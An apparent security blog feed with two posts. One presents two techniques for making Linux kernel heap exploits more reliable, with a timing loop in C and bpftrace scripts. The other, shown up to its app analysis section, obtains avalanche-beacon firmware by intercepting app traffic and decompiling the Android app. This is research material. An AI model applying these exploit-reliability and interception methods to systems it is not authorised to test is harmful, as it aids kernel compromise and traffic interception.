<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://blog.eb9f.de/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.eb9f.de/" rel="alternate" type="text/html" /><updated>2026-01-28T23:30:20+00:00</updated><id>https://blog.eb9f.de/feed.xml</id><title type="html">0xeb9f</title><subtitle>Just another one of those blogs on Linux and stuff</subtitle><entry><title type="html">Improving Linux Heap Exploit Reliability with FreshSlices and CPU-Bullying</title><link href="https://blog.eb9f.de/2026/01/28/freshslices_and_cpubullies.html" rel="alternate" type="text/html" title="Improving Linux Heap Exploit Reliability with FreshSlices and CPU-Bullying" /><published>2026-01-28T00:00:00+00:00</published><updated>2026-01-28T00:00:00+00:00</updated><id>https://blog.eb9f.de/2026/01/28/freshslices_and_cpubullies</id><content type="html" xml:base="https://blog.eb9f.de/2026/01/28/freshslices_and_cpubullies.html"><![CDATA[<p><strong>tl;dr: This blog post presents two (afaik) novel, generic techniques for improving the reliability of kernel heap exploits.</strong></p>

<p>Exploits built around heap-based memory corruptions will never be perfectly reliable. There are multiple factors contributing to this, one being that the heap is shared among all tasks (user processes and kernel threads) running on a machine. Thus, the task running the exploit cannot exercise perfect control over it.</p>

<p>Much has already been written about the art of shaping the kernel heap and creating desired layouts reliably. This post assumes a reader who is somewhat familiar with the subject, i.e., I will not recount any basics here. Instead, I will focus on two generic techniques for improving an exploit process’ control over the kernel heap.</p>

<ol id="markdown-toc">
  <li><a href="#motivating-example" id="markdown-toc-motivating-example">Motivating Example</a></li>
  <li><a href="#technique-i-freshslices" id="markdown-toc-technique-i-freshslices">Technique I: FreshSlices</a></li>
  <li><a href="#technique-ii-cpu-bullying" id="markdown-toc-technique-ii-cpu-bullying">Technique II: CPU-Bullying</a></li>
  <li><a href="#project-ideas" id="markdown-toc-project-ideas">Project Ideas</a></li>
  <li><a href="#code" id="markdown-toc-code">Code</a></li>
</ol>

<h2 id="motivating-example">Motivating Example</h2>

<p>To get started, let’s look at the timeline of a prototypical, heap-based kernel exploit. (In the example we will use a UAF vulnerability, but the same reasoning applies to OOB writes and DFs.)</p>

<p><img src="/media/freshslices_and_cpubullies/drawings-succ_expl.jpg" alt="drawings-succ_expl" />
<em>Timeline of a successful kernel heap exploit.</em></p>

<p>Here:</p>
<ol>
  <li>The exploit task makes a syscall that results in the freeing of the vulnerable object.</li>
  <li>Another syscall is performed to cause the allocation of another object in the slot previously occupied by the vulnerable object.</li>
  <li>During a third syscall, a dangling pointer to the vulnerable object is used and the resulting type-confusion is exploited.</li>
</ol>

<p>So far, so good – but there is a time window between events 1 and 2 where the slot of the vulnerable object is vacant. I will call this time interval an <strong>“exploit-critical region” (ECR)</strong>. We can informally <strong>define an ECR as a time span in which any heap operation that is not controlled or observable by the exploit task has the potential of causing the exploit to fail.</strong> A single exploit may have multiple ECRs.</p>

<p>To get a feeling for how an uncontrolled heap operation during an ECR may cause exploit failure we can have a look at the following, alternative timeline.</p>

<p><img src="/media/freshslices_and_cpubullies/drawings-fail_exp.jpg" alt="drawings-fail_exp" />
<em>Timeline of a failed kernel heap exploit.</em></p>

<p>Here:</p>
<ol>
  <li>The exploit task makes a syscall that results in the freeing of the vulnerable object.</li>
  <li>An interrupt occurs, and on exit from the interrupt handler, the scheduler is invoked. It decides to withdraw the CPU from the exploit task.</li>
  <li>Some unrelated task is scheduled. It performs a syscall that causes a heap allocation that reuses the vacant slot of the vulnerable object.</li>
  <li>When the exploit task gets the CPU back, it tries to allocate the fake object in the slot previously occupied by the vulnerable object, however, this endeavor is doomed to failure.</li>
  <li>The UAF is triggered but operates on the wrong object – a good recipe for blinking shift keys.</li>
</ol>

<p>In general, the <strong>reliability of heap exploitation is degraded by the following factors</strong>:</p>
<ol>
  <li>unknown initial heap state,</li>
  <li>randomization-based exploit mitigations,</li>
  <li><strong>other actors using the same heap</strong> (above example),</li>
  <li>task migration,</li>
  <li>delayed work mechanisms.</li>
</ol>

<p>I’ll now present two techniques aimed at addressing the third factor. It is assumed that exploitation can reliably take place on a single CPU via pinning. However, it may be possible to adapt the first technique to scenarios where pinning is blocked.</p>

<h2 id="technique-i-freshslices">Technique I: FreshSlices</h2>

<p><a href="https://www.vittoriozaccaria.net/blog/notes-on-linux-eevdf">Task scheduling</a> in the Linux kernel is a somewhat complex topic and our discussion is going to remain on a qualitative level. In general, the scheduler’s job is to multiplex the CPU among all runnable tasks. For our purposes, it suffices to know that the scheduler assigns a fraction of the CPU to each task and tries to ensure that in any given interval $\Delta t$ every runnable task has run for the time $c\Delta t$, where $c$ is the fraction of the CPU granted to the task. In reality, of course, $\Delta t$ is not arbitrarily small but somewhere on the order of milliseconds.</p>

<p>From this high-level design, it follows that a task which has already been executing for some time has consumed a larger share of its allotted CPU budget relative to its competitors. The key observation here is that <strong>the instantaneous risk of a task losing the CPU to another task increases the longer it has been running</strong>.</p>

<p>This implies that we want our ECR to be as close as possible to the start of our run on the CPU that the scheduler has granted us. Thus, we need a way to determine when “we just got the CPU back after a break on the bench”.</p>

<p>To do this we can sample the time stamp counter (TSC) register in a tight loop. As the timescale on which we can sample the TSC is small compared to the other relevant timescales (IRQ handlers, IRQ handler followed by a no-op context switch, or preemption by another task) we can reliably use it to determine the <strong>duration of our task’s runs on the CPU</strong>, the <strong>time we spent on the runqueue</strong> waiting for the CPU, and the <strong>moment we get the CPU back</strong>. We can furthermore tell if we got the CPU back after a preemption, an interrupt, or an interrupt followed by a no-op context switch as those timescales are (most of the time) sufficiently different.</p>

<p><img src="/media/freshslices_and_cpubullies/drawings-tsc_sc.jpg" alt="drawings-tsc_sc" />
<em>TSC-sampling method for tracing scheduler operation.</em></p>

<p>Let’s use this method to detect when the scheduler re-evaluates our presence on the CPU, i.e., when our task is involved in a <code class="language-plaintext highlighter-rouge">sched_switch</code>. In particular, we are not interested in interrupts that do not enter the scheduler as those are irrelevant from an exploitation point of view.</p>

<p>Concretely, the measurement logic of our program looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint64_t</span> <span class="n">start</span> <span class="o">=</span> <span class="n">rdtsc</span><span class="p">();</span>
<span class="kt">uint64_t</span> <span class="n">prev</span> <span class="o">=</span> <span class="n">start</span><span class="p">;</span>

<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">i</span> <span class="o">&lt;</span> <span class="n">N_TIMESLICES</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">cur</span> <span class="o">=</span> <span class="n">rdtsc</span><span class="p">();</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">cur</span> <span class="o">-</span> <span class="n">prev</span> <span class="o">&gt;</span> <span class="n">SCHED_RUN_CYCLES</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">timeslices</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">prev</span> <span class="o">-</span> <span class="n">start</span><span class="p">;</span>
        <span class="n">off_times</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">cur</span> <span class="o">-</span> <span class="n">prev</span><span class="p">;</span>
        <span class="n">start</span> <span class="o">=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="n">i</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">loop_total</span> <span class="o">+=</span> <span class="n">cur</span> <span class="o">-</span> <span class="n">prev</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">prev</span> <span class="o">=</span> <span class="n">cur</span><span class="p">;</span>
    <span class="n">loops</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><em>An implementation of the FreshSlices technique.</em></p>

<p>Where:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">SCHED_RUN_CYCLES</code> (approx. 18us, found empirically) is a timescale (in cycles aka. TSC quanta) that is meant to separate IRQ handlers with and without a <code class="language-plaintext highlighter-rouge">sched_switch</code></li>
  <li><code class="language-plaintext highlighter-rouge">loop_total</code> approximates the total number of cycles spent executing the measurement loop</li>
  <li><code class="language-plaintext highlighter-rouge">N_TIMESLICES</code> is the number of <code class="language-plaintext highlighter-rouge">sched_switch</code> events we want to detect</li>
  <li><code class="language-plaintext highlighter-rouge">timeslices[]</code> is an array of cycles between distinct <code class="language-plaintext highlighter-rouge">sched_switch</code> events where we were <code class="language-plaintext highlighter-rouge">next</code> and then <code class="language-plaintext highlighter-rouge">prev</code></li>
  <li><code class="language-plaintext highlighter-rouge">off_times[]</code> is an array of cycles between distinct <code class="language-plaintext highlighter-rouge">sched_switch</code> events where we were <code class="language-plaintext highlighter-rouge">prev</code> and then <code class="language-plaintext highlighter-rouge">next</code>, or the duration of a single no-op switch</li>
</ul>

<p>Running this program and plotting a histogram of the measured <code class="language-plaintext highlighter-rouge">timeslices</code> array gives us the following result.</p>

<p><img src="/media/freshslices_and_cpubullies/hist_ts_single_idle.png" alt="hts_idle_single" />
<em>Histogram of timeslices of the test program measured by the test program itself.</em></p>

<p>We can validate that our measurement is correct by writing a small <code class="language-plaintext highlighter-rouge">bpftrace</code> script that attaches to the <code class="language-plaintext highlighter-rouge">sched_switch</code> tracepoint and collects the information we would expect to see in the <code class="language-plaintext highlighter-rouge">timeslices</code> array.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BEGIN
{
	printf("Tracing CPU scheduler... Hit Ctrl-C to end.\n");
	@target_comm = str($1);
}

tracepoint:sched:sched_switch
{
	if (args.next_comm == @target_comm &amp;&amp;
	    args.prev_comm == @target_comm &amp;&amp;
	    @start != 0) {
          @usecs = hist((nsecs - @start) / 1000);
	  @start = nsecs;
	} else if (args.next_comm == @target_comm) {
	  @start = nsecs;
	} else if (args.prev_comm == @target_comm &amp;&amp; @start != 0) {
          @usecs = hist((nsecs - @start) / 1000);
	  @start = 0;
	}
}
</code></pre></div></div>

<p>Running this script while performing the experiment can be used to confirm the measurement results.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@usecs:
[16, 32)               3 |@@@@@@@@@@@@@@@@@@@@@@@@@@                          |
[32, 64)               6 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[64, 128)              0 |                                                    |
[128, 256)             0 |                                                    |
[256, 512)             5 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@         |
[512, 1K)              0 |                                                    |
[1K, 2K)               0 |                                                    |
[2K, 4K)               0 |                                                    |
[4K, 8K)               0 |                                                    |
[8K, 16K)              0 |                                                    |
[16K, 32K)             1 |@@@@@@@@                                            |
[32K, 64K)             1 |@@@@@@@@                                            |
[64K, 128K)            2 |@@@@@@@@@@@@@@@@@                                   |
[128K, 256K)           2 |@@@@@@@@@@@@@@@@@                                   |
</code></pre></div></div>
<p><em>Histogram of timeslices of the test program measured by the bpf program.</em></p>

<p>The above experiments were performed on a relatively calm desktop system. Repeating them on the same system while building a Linux kernel on all cores results in the following results.</p>

<p><img src="/media/freshslices_and_cpubullies/hist_ts_single_busy.png" alt="hist_ts_single_busy" />
<em>Histogram of timeslices of the test program measured by the test program itself (while building the Linux kernel).</em></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@usecs:
[2K, 4K)              15 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[4K, 8K)               2 |@@@@@@                                              |
[8K, 16K)              1 |@@@                                                 |
</code></pre></div></div>
<p><em>Histogram of timeslices of the test program measured by the bpf program (while building the Linux kernel).</em></p>

<p>All in all, the TSC-sampling method described in this section allows an exploit program to trace the scheduler operation on its CPU, thus enabling more informed decisions regarding commitment to the execution of ECRs.</p>

<p><em>Note: Exploits sometimes do a <code class="language-plaintext highlighter-rouge">sched_yield()</code> before starting an ECR. This is giving the scheduler an early chance to select a more eligible task to run, i.e., if it returns we know that the scheduler has just decided that we are the most eligible task. However, it is neither telling us <strong>how</strong> eligible we were, nor is it changing any scheduling-related parameters of our process. The advantage of the above technique is that it gives us more information (duration of previous runs on the CPU, time spent off CPU) that we can use to decide whether we want to “take” our current run to perform the ECR. (An added bonus is that this method cannot be blocked via seccomp profiles).</em></p>

<h2 id="technique-ii-cpu-bullying">Technique II: CPU-Bullying</h2>

<p>FreshSlices aims to address unreliability factor number three by committing to ECRs only when we determine that there is a low risk of our task being preempted by another. However, it doesn’t <em>guarantee</em> that we are not preempted; thus, wouldn’t it be nice if we could also reduce the probability that a preempting task is using the heap? CPU-Bullying is a technique to achieve just that.</p>

<p>The scheduler aims to distribute load evenly across CPUs – a process called <em>load balancing</em> (<a href="https://web.cs.ucdavis.edu/~araybuck/teaching/papers/the_linux_schedule_a_decade_of_wasted_cores.pdf">ref</a> and <a href="https://oska874.gitbooks.io/process-scheduling-in-linux/content/chapter10.html">ref</a>). Most of the tasks on a system are not bound to a specific CPU, and are thus free to be moved around by the scheduler’s load balancing code.</p>

<p>The idea behind <strong>CPU-Bullying</strong> is simple: <strong>spawn a number of CPU-bound tasks on the same core as the exploit task to force the migration of unrelated tasks to other CPUs</strong>. As the execution of those tasks does not cause any kernel heap usage, <strong>being preempted by them is irrelevant</strong> from an exploit perspective.</p>

<p>A small <code class="language-plaintext highlighter-rouge">bpftrace</code> script can be used to observe task migrations.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BEGIN
{
    printf("Tracing CPU migration from/to CPU0... Hit Ctrl-C to end.\n");
}

tracepoint:sched:sched_migrate_task
{
    if (args.orig_cpu == 0 &amp;&amp; args.dest_cpu != 0) {
        printf("---&gt;&gt; %d\t'%s'\n", args.pid, args.comm);
    } else if (args.dest_cpu == 0 &amp;&amp; args.orig_cpu != 0) {
        printf("&lt;&lt;--- %d\t'%s'\n", args.pid, args.comm);
    }
}
</code></pre></div></div>
<p><em><code class="language-plaintext highlighter-rouge">bpftrace</code> script to trace migration from/to CPU0.</em></p>

<p>Under normal operation, there is a constant stream of migration from and to a CPU.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./trace_task_migration_cpu0.bt
Attached 2 probes
Tracing CPU migration from/to CPU0... Hit Ctrl-C to end.
&lt;&lt;--- 5278	'threaded-ml'
&lt;&lt;--- 3035	'pipewire-pulse'
---&gt;&gt; 5278	'threaded-ml'
&lt;&lt;--- 2804	'Xorg'
---&gt;&gt; 3035	'pipewire-pulse'
---&gt;&gt; 2804	'Xorg'
&lt;&lt;--- 4922	'threaded-ml'
---&gt;&gt; 18377	'kworker/u48:11'
---&gt;&gt; 4922	'threaded-ml'
&lt;&lt;--- 2804	'Xorg'
&lt;&lt;--- 18431	'alacritty'
...
</code></pre></div></div>
<p><em>Load balancing task migration from and to CPU0.</em></p>

<p>Another interesting observable is the set of tasks that are scheduled on a given CPU in a fixed time interval. This requires a (slightly) longer <code class="language-plaintext highlighter-rouge">bpftrace</code> script, but in the end we can confirm that our CPU0 idles ~95% of the time.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./tasks_cpu0.bt
...
pid 05269	comm AudioOutputDevi	total rt 529 us
pid 00018	comm ksoftirqd/0    	total rt 13 us
pid 04922	comm threaded-ml    	total rt 3006 us
pid 02464	comm opensnitchd    	total rt 535 us
pid 05278	comm threaded-ml    	total rt 4440 us
pid 02832	comm brave          	total rt 510 us
pid 18911	comm StreamT~ns #912	total rt 342 us
pid 18715	comm kworker/0:1    	total rt 124 us
pid 05274	comm threaded-ml    	total rt 267 us
pid 04734	comm event_engine   	total rt 1491 us
pid 05501	comm chromium       	total rt 334 us
pid 02825	comm pavucontrol    	total rt 3419 us
pid 03968	comm Chrome_ChildIOT	total rt 143 us
pid 00000	comm swapper/0      	total rt 947829 us
pid 05280	comm ThreadPoolSingl	total rt 1998 us
pid 05268	comm AudioProcessing	total rt 13883 us
pid 03035	comm pipewire-pulse 	total rt 1467 us
pid 03995	comm WebRTC_W_and_N 	total rt 348 us
...
</code></pre></div></div>
<p><em>Tasks running on CPU0 during a period of 1s.</em></p>

<p>Spawning a large number of CPU-bound tasks on the same CPU as the one running the exploit task leads to a distinct exodus of unrelated tasks.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;&lt;--- 19133	'cpu_bully'
---&gt;&gt; 19125	'bpftrace'
---&gt;&gt; 3895	'brave'
---&gt;&gt; 2804	'Xorg'
---&gt;&gt; 5033	'Compositor'
---&gt;&gt; 5027	'brave'
---&gt;&gt; 6367	'SharedWorker th'
---&gt;&gt; 4728	'event_engine'
---&gt;&gt; 10069	'G1 Service'
---&gt;&gt; 3994	'WebRTC_Signalin'
---&gt;&gt; 2457	'thermald'
---&gt;&gt; 5516	'chromium'
---&gt;&gt; 13434	'HangWatcher'
---&gt;&gt; 5757	'HangWatcher'
---&gt;&gt; 5500	'CacheThread_Blo'
---&gt;&gt; 17926	'HangWatcher'
---&gt;&gt; 3899	'HangWatcher'
---&gt;&gt; 3981	'HangWatcher'
---&gt;&gt; 18756	'kworker/u48:7'
---&gt;&gt; 18518	'kworker/u48:13'
---&gt;&gt; 19000	'ServiceWorker t'
---&gt;&gt; 5713	'Chrome_ChildIOT'
</code></pre></div></div>
<p><em>Migration of unrelated tasks away from CPU0 when performing CPU-Bullying.</em></p>

<p>The <code class="language-plaintext highlighter-rouge">cpu_bully</code> program pins itself to CPU0, spawns ten CPU-bound threads (also pinned to CPU0), and then busy-waits for a while to give the load balancer a chance to migrate all movable tasks to other CPUs. We can clearly see this happening using our first script.</p>

<p>It then goes on to simulate an ECR by changing its <code class="language-plaintext highlighter-rouge">comm</code> to <code class="language-plaintext highlighter-rouge">ecr</code> (and later to <code class="language-plaintext highlighter-rouge">no_ecr</code> to mark the end of the simulated ECR). Using the second script, we can confirm that only a minimal number of unrelated tasks (only those also pinned to CPU0) are scheduled during the ECR.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>----
pid 19212	comm cpu_bully/5    	total rt 93314 us
pid 19207	comm cpu_bully/0    	total rt 89998 us
pid 19060	comm kworker/0:2    	total rt 14 us
pid 19214	comm cpu_bully/7    	total rt 89994 us
pid 19216	comm cpu_bully/9    	total rt 89990 us
pid 19209	comm cpu_bully/2    	total rt 89992 us
pid 19211	comm cpu_bully/4    	total rt 93319 us
pid 19208	comm cpu_bully/1    	total rt 89990 us
pid 19206	comm cpu_bully      	total rt 89982 us
pid 19210	comm cpu_bully/3    	total rt 89985 us
pid 19215	comm cpu_bully/8    	total rt 89997 us
pid 19213	comm cpu_bully/6    	total rt 89995 us
----
pid 19212	comm cpu_bully/5    	total rt 76916 us
pid 19207	comm cpu_bully/0    	total rt 78819 us
pid 19060	comm kworker/0:2    	total rt 24 us
pid 00762	comm irq/174-iwlwifi	total rt 17 us
pid 19214	comm cpu_bully/7    	total rt 76027 us
pid 19216	comm cpu_bully/9    	total rt 79462 us
pid 19209	comm cpu_bully/2    	total rt 77559 us
pid 19211	comm cpu_bully/4    	total rt 76149 us
pid 00107	comm irq/9-acpi     	total rt 1147 us
pid 19208	comm cpu_bully/1    	total rt 79143 us
pid 19206	comm ecr             	total rt 92847 us
pid 19210	comm cpu_bully/3    	total rt 78881 us
pid 19215	comm cpu_bully/8    	total rt 79910 us
pid 19213	comm cpu_bully/6    	total rt 78741 us
----
pid 19212	comm cpu_bully/5    	total rt 75100 us
pid 19207	comm cpu_bully/0    	total rt 75160 us
pid 19060	comm kworker/0:2    	total rt 9 us
pid 19214	comm cpu_bully/7    	total rt 74969 us
pid 19216	comm cpu_bully/9    	total rt 76472 us
pid 19209	comm cpu_bully/2    	total rt 75875 us
pid 19211	comm cpu_bully/4    	total rt 75261 us
pid 19208	comm cpu_bully/1    	total rt 74867 us
pid 19206	comm no_ecr          	total rt 92950 us
pid 19210	comm cpu_bully/3    	total rt 76807 us
pid 19215	comm cpu_bully/8    	total rt 76178 us
pid 19213	comm cpu_bully/6    	total rt 76647 us
pid 00023	comm migration/0    	total rt 2 us
</code></pre></div></div>
<p><em>Tasks scheduled on CPU0 in three consecutive seconds during a simulated ECR with CPU-Bullying.</em></p>

<p>Repeating the above experiments on a loaded system (compiling Linux on all cores) yields the same results.</p>

<p>In general, CPU-Bullying seems to be a promising technique to practically eliminate the threat that unexpected heap usage poses to exploit reliability. I also consider it to be strictly more powerful than FreshSlices. However, FreshSlices may still be useful in situations where sandboxes limit an exploit’s resource consumption or block the <code class="language-plaintext highlighter-rouge">sched_setaffinity</code> syscall.</p>

<h2 id="project-ideas">Project Ideas</h2>

<p>It seems like those ideas could be a nice starting point for a student project - because they are exactly that: <em>ideas</em>. While they might sound reasonable and my ad-hoc experiments seem to back this belief, they lack a proper evaluation. There is even a closely-related <a href="https://www.usenix.org/conference/usenixsecurity22/presentation/zeng">paper</a> that could serve as a blueprint for such a work.</p>

<h2 id="code">Code</h2>

<p>The code mentioned in this post can be found <a href="https://github.com/vobst/freshslices_and_cpubullies">here</a>.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[tl;dr: This blog post presents two (afaik) novel, generic techniques for improving the reliability of kernel heap exploits.]]></summary></entry><entry><title type="html">Pieps: A Case Study in Non-invasive Firmware Acquisition</title><link href="https://blog.eb9f.de/2025/01/30/pieps_00.html" rel="alternate" type="text/html" title="Pieps: A Case Study in Non-invasive Firmware Acquisition" /><published>2025-01-30T00:00:00+00:00</published><updated>2025-01-30T00:00:00+00:00</updated><id>https://blog.eb9f.de/2025/01/30/pieps_00</id><content type="html" xml:base="https://blog.eb9f.de/2025/01/30/pieps_00.html"><![CDATA[<p><em>In retrospect, it is often incomprehensible why one started going down a rabbit hole. No matter how I fell in, my trusty recipe for climbing back out is to write everything down in a blog post — so have fun.</em></p>

<p>This time, for some reason that is no longer entirely clear to me, I wanted to examine the firmware of my <a href="https://www.pieps.com/en/product/pro-ips/">Pieps IPS Pro</a>. Briefly, the Austrian company Pieps is a leading manufacturer of <a href="https://en.wikipedia.org/wiki/Avalanche_transceiver">avalanche beacons</a>, a class of personal safety devices designed to locate people buried under snow avalanches. Unsurprisingly, their main target audience are backcountry skiers.</p>

<p>However, for the sake of this post, the specific device does not matter all that much. I’d rather like to use the opportunity for a little case study in firmware acquisition, i.e., the process of obtaining a device’s firmware for subsequent analysis. In particular, we will focus on <em>non-invasive</em> firmware acquisition, as a soldering iron should be nowhere near a personal safety device that you still intend to use afterward…</p>

<ol id="markdown-toc">
  <li><a href="#network-analysis" id="markdown-toc-network-analysis">Network Analysis</a></li>
  <li><a href="#app-analysis" id="markdown-toc-app-analysis">App Analysis</a>    <ol>
      <li><a href="#android" id="markdown-toc-android">Android</a></li>
      <li><a href="#ios" id="markdown-toc-ios">iOS</a></li>
      <li><a href="#net" id="markdown-toc-net">.NET</a></li>
    </ol>
  </li>
  <li><a href="#firmware-download" id="markdown-toc-firmware-download">Firmware Download</a></li>
  <li><a href="#firmware-analysis" id="markdown-toc-firmware-analysis">Firmware Analysis</a></li>
  <li><a href="#conclusion" id="markdown-toc-conclusion">Conclusion</a></li>
</ol>

<h2 id="network-analysis">Network Analysis</h2>

<p>There are a number of simple, non-invasive techniques for obtaining a device’s firmware. In the easiest case, it is available for download on the vendor’s website. For some devices, it can also be obtained directly from the device via a web interface, shell, or removable storage medium. In our case, however, those methods do not apply.</p>

<p>Like many other modern consumer electronics, the IPS Pro itself offers only very limited user interaction and all management tasks are performed via a smartphone app. In such cases, another easy approach is to capture an over-the-air (OTA) update. For our device, firmware updates are performed over Bluetooth Low Energy (BLE) via the smartphone app. We can attempt to capture the update on two links: between the vendor’s backend servers and the app, or between the app and the device.</p>

<p>Most often, communication between the app and the backend uses standard HTTPS on port 443. To capture this traffic, we can configure a transparent HTTP(S) proxy (<a href="https://docs.mitmproxy.org/stable/howto-transparent/">mitmproxy</a> in my case) on the router that the device is using and install the proxy’s certificate on the device. As a side note, using a regular, non-transparent proxy would not work, as the app’s communication with the backend is not proxy-aware <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. Also, note that the app is not using certificate pinning, so we can save ourselves the trouble of setting up one of the Frida-based solutions to bypass it.</p>

<p>On the BLE side, the procedure depends on the mobile device running the app. I had an iOS device at hand so that was what I ended up using. Here, you must first install a <a href="https://developer.apple.com/services-account/download?path=/iOS/iOS_Logs/iOSBluetoothLogging.mobileconfig">configuration profile for extended Bluetooth logging</a>. You also need to download the Additional Tools for Xcode; in particular, we need the PacketLogger tool. Then, we can connect the device to a Mac and start capturing <a href="https://www.bluetooth.com/wp-content/uploads/Files/Specification/HTML/Core-54/out/en/host-controller-interface/host-controller-interface-functional-specification.html">Host Controller Interface (HCI)</a> traffic. See this <a href="https://novelbits.io/debugging-sniffing-secure-ble-ios/">post</a> for more information.</p>

<p>Now, we can observe network and BLE traffic during events such as app startup, account login, device pairing, or device configuration. Unfortunately, the devices I had available were all running the latest firmware <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>; thus, obtaining a firmware sample that way was not possible.</p>

<h2 id="app-analysis">App Analysis</h2>

<p>Since waiting for the vendor to release a firmware update is boring, we can cut the wait short by analyzing the mobile app itself. After all, it must include all the logic required to download and install a new firmware image. Here, I generally prefer working with Android applications, simply because it is a much more open platform.</p>

<h3 id="android">Android</h3>

<p>After <a href="https://apkpure.com/pieps/com.pieps.app">downloading the APK</a>, opening it in <a href="https://github.com/skylot/jadx">JADX</a>, and navigating to the main Activity we end up at the following class.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">package</span> <span class="nn">crc64185aabf9370d726d</span><span class="o">;</span>

<span class="o">[...]</span>
<span class="kn">import</span> <span class="nn">mono.android.Runtime</span><span class="o">;</span>
<span class="o">[...]</span>

<span class="cm">/* loaded from: classes.dex */</span>
<span class="kd">public</span> <span class="kd">class</span> <span class="nc">SplashScreenActivity</span> <span class="kd">extends</span> <span class="nc">Activity</span> <span class="kd">implements</span> <span class="nc">IGCUserPeer</span> <span class="o">{</span>
    <span class="kd">public</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">String</span> <span class="n">__md_methods</span> <span class="o">=</span> <span class="s">"n_onCreate:(Landroid/os/Bundle;Landroid/os/PersistableBundle;)V:GetOnCreate_Landroid_os_Bundle_Landroid_os_PersistableBundle_Handler\nn_onResume:()V:GetOnResumeHandler\n"</span><span class="o">;</span>
<span class="o">[...]</span>

    <span class="kd">private</span> <span class="kd">native</span> <span class="kt">void</span> <span class="nf">n_onCreate</span><span class="o">(</span><span class="nc">Bundle</span> <span class="n">bundle</span><span class="o">,</span> <span class="nc">PersistableBundle</span> <span class="n">persistableBundle</span><span class="o">);</span>

<span class="o">[...]</span>

    <span class="kd">static</span> <span class="o">{</span>
        <span class="nc">Runtime</span><span class="o">.</span><span class="na">register</span><span class="o">(</span><span class="s">"Pieps.App.Droid.SplashScreenActivity, PiepsApp.Droid"</span><span class="o">,</span> <span class="nc">SplashScreenActivity</span><span class="o">.</span><span class="na">class</span><span class="o">,</span> <span class="n">__md_methods</span><span class="o">);</span>
    <span class="o">}</span>

<span class="o">[...]</span>

    <span class="nd">@Override</span> <span class="c1">// android.app.Activity</span>
    <span class="kd">public</span> <span class="kt">void</span> <span class="nf">onCreate</span><span class="o">(</span><span class="nc">Bundle</span> <span class="n">bundle</span><span class="o">,</span> <span class="nc">PersistableBundle</span> <span class="n">persistableBundle</span><span class="o">)</span> <span class="o">{</span>
        <span class="n">n_onCreate</span><span class="o">(</span><span class="n">bundle</span><span class="o">,</span> <span class="n">persistableBundle</span><span class="o">);</span>
    <span class="o">}</span>

<span class="o">[...]</span>
<span class="o">}</span>
</code></pre></div></div>
<p><em>Listing: Main Activity of the Pieps Android app.</em></p>

<p>At this point I was a bit confused. Where is the application’s business logic? It took me a while to realize that the app was built using <a href="https://visualstudio.microsoft.com/xamarin/">Xamarin</a>, which is a framework to build cross-platform applications in .NET. Thus, all of the Java code that I had been looking at is just framework and glue code that exists to host a .NET runtime in the app’s process. Once you know what Xamarin apps look like, they are pretty easy to recognize in the future due to the presence of the <code class="language-plaintext highlighter-rouge">com.xamarin.*</code> and <code class="language-plaintext highlighter-rouge">xamarin.*</code> namespaces, it was just the first time that I encountered one.</p>

<p>With that knowledge in mind, we can also briefly explain what the above code is about. As usual, the <code class="language-plaintext highlighter-rouge">onCreate</code> method is called when the app is started. It wraps the <code class="language-plaintext highlighter-rouge">n_onCreate</code> method, which is a native method of the same class. We find a hint about where to look for the implementation of the native method in the static initializer block of the class. Here, the call to <code class="language-plaintext highlighter-rouge">Runtime.register</code> in combination with the class’ <code class="language-plaintext highlighter-rouge">__md_methods</code> field connects the <code class="language-plaintext highlighter-rouge">onCreate</code> and <code class="language-plaintext highlighter-rouge">onResume</code> methods of the C# class <code class="language-plaintext highlighter-rouge">Pieps.App.Droid.SplashScreenActivity</code> in the <code class="language-plaintext highlighter-rouge">PiepsApp.Droid</code> assembly with the corresponding native method <code class="language-plaintext highlighter-rouge">n_onCreate</code> and <code class="language-plaintext highlighter-rouge">n_onResume</code> of the <code class="language-plaintext highlighter-rouge">SplashScreenActivity.class</code> java class. Here, <code class="language-plaintext highlighter-rouge">mono</code> is the name of the .NET runtime used by the Xamarin framework (at least for Android and iOS targets).</p>

